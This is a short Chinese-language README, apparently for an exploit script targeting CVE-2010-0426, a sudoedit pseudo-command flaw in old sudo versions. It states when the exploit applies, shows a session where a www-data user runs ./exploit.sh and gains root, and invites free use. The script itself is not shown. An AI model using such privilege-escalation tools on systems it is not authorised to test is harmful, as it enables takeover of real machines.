https://www.cvedetails.com/cve/CVE-2010-0426/
sudo 1.6.x(早于 1.6.9p21)和 1.7.x(早于 1.7.2p4)版本,当启用了伪命令(pseudo-command)时,允许将伪命令的名称与任意目录中可执行文件的名称相匹配,从而允许本地用户通过精心构造的可执行文件获取权限,如用户主目录中名为 sudoedit 的文件所示。
当 sudoedit 二进制文件具有 suid 权限,并且某个文件可以以 sudo 身份编辑时,提升权限(使用 sudo -l 检查)
./exploit.sh
从低权限反向 shell 提升到 root
www-data@g1vi:/var/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@g1vi:/var/tmp$ ./exploit.sh
[+] Target is vulnerable
[+] Running stuff...
root@g1vi:/var/tmp$ id
uid=0(root) gid=0(root) groups=0(root)
欢迎随时随地自由使用或修改。